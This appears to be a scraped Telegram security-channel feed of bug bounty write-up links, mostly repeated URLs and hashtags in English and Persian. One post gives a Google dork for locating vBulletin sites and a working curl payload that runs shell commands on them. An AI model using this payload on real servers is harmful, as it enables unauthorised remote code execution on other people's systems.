How I was Able To bypass CloudFlare WAF
https://link.medium.com/HZR2xGPHH8
#CDN
#WAF
#Bypass
#CloudFlare
#BugBounty
@web_priv8
https://link.medium.com/HZR2xGPHH8
#CDN
#WAF
#Bypass
#CloudFlare
#BugBounty
@web_priv8
Forwarded from digMeMore (r00t98)
This media is not supported in your browser
VIEW IN TELEGRAM
Google Account XSSI
آسیب پذیری XSSI جایی رخ میده که یکسری اطلاعات حساس داخل فایل های جاوااسکریپت قرار میگیره و از اونجایی که SOP واس src کردن فایل های جاوااسکریپت محدودیت نداره اجازه میده که فایل src شه و اطلاعات کاربر خونده شه.
#XSSI
#BugBounty
@digmemore
آسیب پذیری XSSI جایی رخ میده که یکسری اطلاعات حساس داخل فایل های جاوااسکریپت قرار میگیره و از اونجایی که SOP واس src کردن فایل های جاوااسکریپت محدودیت نداره اجازه میده که فایل src شه و اطلاعات کاربر خونده شه.
#XSSI
#BugBounty
@digmemore
Web Cache Entanglement: Novel Pathways to Poisoning
https://portswigger.net/research/web-cache-entanglement
#WCP
@web_priv8
https://portswigger.net/research/web-cache-entanglement
#WCP
@web_priv8
How i find Blind Remote Code Execution vulnerability
https://medium.com/@viveik.chauhan/blind-remote-code-execution-b9c4e119f7c3
#RCE
#Blind
#BugBounty
@web_priv8
https://medium.com/@viveik.chauhan/blind-remote-code-execution-b9c4e119f7c3
#RCE
#Blind
#BugBounty
@web_priv8
Medium
Blind Remote Code Execution
Introduction
banning users Race condition
https://wisdomfreak.com/2020/08/banning-users-race-condition/
#RC
#BugBounty
@web_priv8
https://wisdomfreak.com/2020/08/banning-users-race-condition/
#RC
#BugBounty
@web_priv8
WisdomFreak
Banning users Bug: Race condition - WisdomFreak
For example, you are booking a train ticket online and only a single seat ( assume seat no:5 ) is there. now you book a ticket for that seat and at the same
This media is not supported in your browser
VIEW IN TELEGRAM
Bypass Old Password with Array revive-adserver.com Bug Bounty
#Bypass
#BugBounty
#BugBountyTip
@web_priv8
#Bypass
#BugBounty
#BugBountyTip
@web_priv8
How to bypass Android certificate pinning and intercept SSL traffic
https://vavkamil.cz/2019/09/15/how-to-bypass-android-certificate-pinning-and-intercept-ssl-traffic/
#Android
#SSL
@web_priv8
https://vavkamil.cz/2019/09/15/how-to-bypass-android-certificate-pinning-and-intercept-ssl-traffic/
#Android
#SSL
@web_priv8
Kamil Vavra @vavkamil
How to bypass Android certificate pinning and intercept SSL traffic
Offensive website security Bug bounty Ethical hacking
آسیب پذیری RCE بر روی روترهای مبین نت
بخش انگلیسی:
https://link.medium.com/2QQKzATVM8
بخش فارسی:
https://vrgl.ir/3gZtC
#RCE
@web_priv8
بخش انگلیسی:
https://link.medium.com/2QQKzATVM8
بخش فارسی:
https://vrgl.ir/3gZtC
#RCE
@web_priv8
Forwarded from امنیت اطلاعات
Subdomains discover + HTTP check + content type/content size/response code + website title + IP + CNAME records + Screenshots of subdomain websites
https://github.com/Edu4rdSHL/findomain
https://asciinema.org/a/352218
#subdomain
#pentest
#bugbounty
@sec_nerd
https://github.com/Edu4rdSHL/findomain
https://asciinema.org/a/352218
#subdomain
#pentest
#bugbounty
@sec_nerd
GitHub
GitHub - Findomain/Findomain: The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP…
The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP check, data import from other tools, subdomain monitoring, alerts via Discord, Slack and Telegram, ...
Forwarded from امنیت اطلاعات
Reflected XSS in Facebook’s mirror websites
https://medium.com/@sudhanshur705/reflected-xss-in-facebooks-mirror-websites-4384b4eb3e11
#writeup
#xss
@sec_nerd
https://medium.com/@sudhanshur705/reflected-xss-in-facebooks-mirror-websites-4384b4eb3e11
#writeup
#xss
@sec_nerd
Forwarded from امنیت اطلاعات
0day RCE exploit on vBulletin 5xx
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
همه چیز در خصوص SSRF
https://medium.com/swlh/intro-to-ssrf-beb35857771f
https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437
https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
#ssrf
#bugbounty
#pentest
#web
@sec_nerd
https://medium.com/swlh/intro-to-ssrf-beb35857771f
https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437
https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
#ssrf
#bugbounty
#pentest
#web
@sec_nerd
Medium
Intro to SSRF
And how your firewall failed you.